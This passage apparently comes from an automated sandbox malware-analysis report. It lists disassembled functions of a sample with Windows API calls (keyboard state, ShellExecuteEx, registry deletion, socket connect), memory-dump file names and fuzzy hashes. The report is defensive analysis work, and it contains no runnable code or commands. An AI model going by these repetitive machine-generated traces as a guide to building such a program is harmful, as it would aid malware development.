                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F06500
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F06520
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                                        • Instruction ID: 97694251d8803bed6d64d40b41fc87b6eaa340661c1e85cf2480904e6ec8f006
                                        • Opcode Fuzzy Hash: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                                        • Instruction Fuzzy Hash: 3B318D72200214BFEB208F10CC4AFEA3FA9FF09765F044065FE08DA191C6759851EB60
                                        Function 00EDC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                                        • Instruction ID: 81b50d76c846a32c2cf5b91f6a027fe182bf2ef528d567b4096d38dd7bd19f40
                                        • Opcode Fuzzy Hash: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                                        • Instruction Fuzzy Hash: 4F21F871601216B7D250A5609C42FEF37ACDF553E8F282012FE05F6382EB11ED22D2E6
                                        Function 00E81424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                                        • Instruction ID: 33ce8d94d4751ac8bf51125fdd9593531322c87935ce3965f7278cce5c1281a1
                                        • Opcode Fuzzy Hash: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                                        • Instruction Fuzzy Hash: 56717E30900119EFCB14DF98CC49AFEBBB9FF85314F148199F919BA251C730AA52DBA0
                                        Function 00F0B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(01162A70), ref: 00F0B6A5
                                        • IsWindowEnabled.USER32(01162A70), ref: 00F0B6B1
                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F0B795
                                        • SendMessageW.USER32(01162A70,000000B0,?,?), ref: 00F0B7CC
                                        • IsDlgButtonChecked.USER32(?,?), ref: 00F0B809
                                        • GetWindowLongW.USER32(01162A70,000000EC), ref: 00F0B82B
                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F0B843
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                        • String ID:
                                        • API String ID: 4072528602-0
                                        • Opcode ID: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                                        • Instruction ID: e32a6c6c38577452bc7e223a773e0c84e8bf13a519aabd9ed1e55063ff362aa5
                                        • Opcode Fuzzy Hash: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                                        • Instruction Fuzzy Hash: 34719F34A00204AFDB30DF64C8A4FAA7BB9FF4A320F1440A9E955973E1C732A941FB51
                                        Function 00EFF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EFF75C
                                        • _memset.LIBCMT ref: 00EFF825
                                        • ShellExecuteExW.SHELL32(?), ref: 00EFF86A
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • GetProcessId.KERNEL32(00000000), ref: 00EFF8E1
                                        • CloseHandle.KERNEL32(00000000), ref: 00EFF910
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 3522835683-2766056989
                                        • Opcode ID: 4a5f56520ec844fd4c4374196eaa0c13f618bd14407cdc819c3922cca139a371
                                        • Instruction ID: 9f2ac01190b3635b8ce4baf1eee8ae308b2f91bf6a5420d10442931cd724e406
                                        • Opcode Fuzzy Hash: 4a5f56520ec844fd4c4374196eaa0c13f618bd14407cdc819c3922cca139a371
                                        • Instruction Fuzzy Hash: 97618B75E006199FCF18EFA4C4819AEBBF5FF48314B149469E95ABB351CB30AD41CB90
                                        Function 00EE145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 00EE149C
                                        • GetKeyboardState.USER32(?), ref: 00EE14B1
                                        • SetKeyboardState.USER32(?), ref: 00EE1512
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE1540
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE155F
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE15A5
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE15C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                                        • Instruction ID: c5f39be1baadc59dcc25796d1f0a2cf8bd561dd4c8cdfec94f1ff80ad4523612
                                        • Opcode Fuzzy Hash: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                                        • Instruction Fuzzy Hash: D951D2B06046DA3EFB3646268C45BBABEA96B46308F0C55C9E1D6658C2D3A49CC8D750
                                        Function 00EE1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00EE12B5
                                        • GetKeyboardState.USER32(?), ref: 00EE12CA
                                        • SetKeyboardState.USER32(?), ref: 00EE132B
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE1357
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE1374
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE13B8
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE13D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                                        • Instruction ID: 8d13c3107d430de1d2a61648f9ed36c5654dfc6c3a21ef07e8a47de4bf99fdb6
                                        • Opcode Fuzzy Hash: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                                        • Instruction Fuzzy Hash: 3851E4B05046D93DFB3282268C45BBA7FA96B06308F0895C9E1D466CC2D3A5ACD8E751
                                        Function 00EE589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        • Opcode ID: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                                        • Instruction ID: 34ab70ef647425f51b921aace18306a5bb4a6d5192dc59b04da59992e6993a41
                                        • Opcode Fuzzy Hash: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                                        • Instruction Fuzzy Hash: 4D41C4A6C2011876CB11EBB58C86ACFB7E89F0A310F50A866F518F7122E734E754C7A5
                                        Function 00EE38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EE38F3
                                        • _wcscmp.LIBCMT ref: 00EE390F
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE3927
                                        • _wcscat.LIBCMT ref: 00EE396F
                                        • SHFileOperationW.SHELL32(?), ref: 00EE39DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1377345388-1173974218
                                        • Opcode ID: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                                        • Instruction ID: a720bb4dcd62a706b5427ce149fecd8b697d631557dbe80e0ff3265442625142
                                        • Opcode Fuzzy Hash: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                                        • Instruction Fuzzy Hash: A441B1B25083889EC751EF75C4859DFB7E8AF89340F10282EF489E3192EB75D688C752
                                        Function 00F07500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00F07519
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F075C0
                                        • IsMenu.USER32(?), ref: 00F075D8
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F07620
                                        • DrawMenuBar.USER32 ref: 00F07633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                        • String ID: 0
                                        • API String ID: 3866635326-4108050209
                                        • Opcode ID: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                                        • Instruction ID: 77e1d664c5cef2e8ed62cd326f3c32f2f8cc80902f5fdcb70325fc4faf54d0f5
                                        • Opcode Fuzzy Hash: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                                        • Instruction Fuzzy Hash: 12412875E04708AFDB20EF54D984AAABBF8FB09324F048069E91697290D731AD54EF90
                                        Function 00F0122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F0125C
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F01286
                                        • FreeLibrary.KERNEL32(00000000), ref: 00F0133D
                                          • Part of subcall function 00F0122D: RegCloseKey.ADVAPI32(?), ref: 00F012A3
                                          • Part of subcall function 00F0122D: FreeLibrary.KERNEL32(?), ref: 00F012F5
                                          • Part of subcall function 00F0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F01318
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F012E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 395352322-0
                                        • Opcode ID: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                                        • Instruction ID: 45aa357b83a715d6d32cd9c322dc28e749abb1d90b2cdcd538e55fcfe9beff40
                                        • Opcode Fuzzy Hash: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                                        • Instruction Fuzzy Hash: 84310BB1D0111DBFEB159B90DC89AFFB7BCFF09310F000169E501E2591EA749E89BAA0
                                        Function 00F0653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F0655B
                                        • GetWindowLongW.USER32(01162A70,000000F0), ref: 00F0658E
                                        • GetWindowLongW.USER32(01162A70,000000F0), ref: 00F065C3
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F065F5
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F0661F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F06630
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F0664A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                                        • Instruction ID: 291ee436dfbb1d92ffbd39a1f82f5b0090b278853eeef6574321c86a7ad94a66
                                        • Opcode Fuzzy Hash: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                                        • Instruction Fuzzy Hash: 7231F235A04258AFDB208F18DC85F653BE1FB5A724F1901A8F911CB2F5CB62A864FB51
                                        Function 00EF6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00EF64D9
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF64E8
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6521
                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EF652A
                                        • WSAGetLastError.WS2_32 ref: 00EF6534
                                        • closesocket.WS2_32(00000000), ref: 00EF655D
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6576
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 910771015-0
                                        • Opcode ID: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                                        • Instruction ID: 27f54d17a1f65878590c8c7fcd2d7f763567ea4958696c7a0fd94471e4c1741f
                                        • Opcode Fuzzy Hash: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                                        • Instruction Fuzzy Hash: CC31937160011CAFDB10AF64DC85BBE7BE9FB44714F049069FA09B7291DB74AD08DBA1
                                        Function 00EDE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE0FA
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE120
                                        • SysAllocString.OLEAUT32(00000000), ref: 00EDE123
                                        • SysAllocString.OLEAUT32 ref: 00EDE144
                                        • SysFreeString.OLEAUT32 ref: 00EDE14D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EDE167
                                        • SysAllocString.OLEAUT32(?), ref: 00EDE175
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 50cb094cd548e1c182ea57cb61f797b6eafc98eff77d7d02eb1d9752ca4e138e
